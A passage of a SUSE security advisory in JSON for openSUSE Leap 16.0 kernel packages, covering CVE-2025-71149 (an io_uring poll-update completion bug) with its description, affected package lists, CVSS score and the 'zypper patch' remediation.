"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71148"
},
{
"cve": "CVE-2025-71149",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71149"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring/poll: correctly handle io_poll_add() return value on update\n\nWhen the core of io_uring was updated to handle completions\nconsistently and with fixed return codes, the POLL_REMOVE opcode\nwith updates got slightly broken. If a POLL_ADD is pending and\nthen POLL_REMOVE is used to update the events of that request, if that\nupdate causes the POLL_ADD to now trigger, then that completion is lost\nand a CQE is never posted.\n\nAdditionally, ensure that if an update does cause an existing POLL_ADD\nto complete, that the completion value isn\u0027t always overwritten with\n-ECANCELED. For that case, whatever io_poll_add() set the value to\nshould just be retained.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71149",
"url": "https://www.suse.com/security/cve/CVE-2025-71149"
},
{
"category": "external",
"summary": "SUSE Bug 1257164 for CVE-2025-71149",
"url": "https://bugzilla.suse.com/1257164"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
